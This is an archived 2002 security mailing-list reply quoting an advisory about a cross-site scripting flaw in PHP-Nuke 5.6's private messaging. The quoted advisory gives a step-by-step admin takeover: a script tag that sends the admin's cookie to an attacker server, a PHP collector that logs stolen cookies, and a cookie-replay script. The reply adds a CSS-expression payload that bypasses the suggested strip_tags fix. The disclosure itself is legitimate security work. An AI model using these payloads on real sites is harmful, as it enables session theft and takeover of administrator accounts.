IMHO this whole email is just stating the obvious. On top of that the proposed fix is flawed. The PHP strip_tags function does not strip attributes so this is possible in your proposed fix : <a done=false STYLE="visibility : hidden; word-spacing : expression( !(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 ); word-wrap : expression(this.done=true);"> test</a> its a bit messy but gets the job done. It works by using css expressions (a feature afaik native to Internet explorer) in the style tag. -- jelmer ----- Original Message ----- From: "<-delusion->" <delusi0nat_private> To: <bugtraqat_private>; <webappsecat_private> Sent: Thursday, August 15, 2002 10:30 AM Subject: PHP-Nuke v5.6 - Users can compromise admin accts. > Tested on PHP-Nuke v5.6 with Mozilla on Linux > (should work on past versions and on most browsers) > > Impact: > --------------------------------------------- > Allows any user to get admin access to a PHP-Nuke site. > > Summary: > ---------------------------------------------- > Due to a XSS flaw in PHPNuke's Private Messaging module, users can send > messages > with html code that will be executed without any filtering. In old PHPNuke > versions > XSS allowed theft of cookies which stored passwords in base64 > encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it > encodes it > into base64 and puts it into a cookie. This made stolen cookies useless if > the attacker just > tried decoding the base64 encrypted pass, because he just got the MD5 > encrypted pass. > > Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass > with the > encrypted one in the database, i was able to use the md5 encrypted pass i > got from the > stolen cookie to authenticate myself. > > PHPNuke sets cookies by base64 encoding a string that looks like this: > > username:md5_encrypted_pass:lang > > Since i can get the md5_encrypted pass all i have to do is launch a script > that base64 encodes > a string like the one above, and sets it as a cookie on my box. > > Exploit: > ------------------------------------------------- > For this exploit to work, you must create the following files in your web > server's directory. > > cookie.php containing this: > <? > $fp = fopen("cookie.txt","a"); > fputs($fp, $cookie); > fclose($fp); > print "Message Not Found!"; /* this is so the admin doesnt get scared. and > thinks its some bug. */ > ?> > > test.php containing: > <? > $admin = base64_encode("decoded_string") ; > setcookie("admin","$admin",time()+2592000); > ?> > You will find out what to replace decoded_string with.. > > 1. Send an appealing private message to admin containing > <script>document.location.replace('http://yourserver/cookie.php?cookie='+doc > ument.cookie);</script> > > 2. Wait awhile until the admin checks the message then check cookie.txt on > yer server. > > 3. From cookie.txt.. copy the encrypted text after admin= and before the ; > > 4. go to http://www.isecurelabs.com/base64.php paste the copied text, click > decode it should give u a string like this: > username:md5_encrypted_passwd:language (language may be blank). > > 5. paste the decoded string into test.php like so. > <? > $admin = base64_encode("paste decoded string here"); > setcookie("admin","$admin",time()+2592000); > ?> > > 6. Login as any user on the site > > 7. send private message to self containing: > <iframe src="http://yerserver/test.php"></iframe> > Open the message and a cookie will now be set on yer box, but it will be > configured with your server's URL. > So all u gotta do is replace yer url wit the nuked site. > > 8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/ > directory replace the url of yer server to the nuked site, > for other browsers just find the Cookie from your server and edit it so > instead of showng your url it shows the url > of the nuked site. > > 9. restart yer browser (close and open up again). go back into the nuked > site and you are now admin. :D > > Temp Solution: > ------------------------------------------------- > Edit reply.php in /modules/Private_Messages/ and make $message be stripped > of html tags. > > Go to line 75 in reply.php and add this line: > > $message = strip_tags($message, '<br><b><u><i>'); > > That will remove any html tags that arent <br><b><u> or <i>. So it will > prevent the XSS. > ------------------------------------------------- > NOTE: I wasnt able to contact the php nuke person, i couldnt find an email > on their site, and when i signed up for membership i never got the password, > so if u can, let them know asap so they can fix this. > > Another Vulnerability Brought to you by, > delusion > http://digital-delusions.dyn.ee > > >
This archive was generated by hypermail 2b30 : Fri Aug 16 2002 - 10:02:25 PDT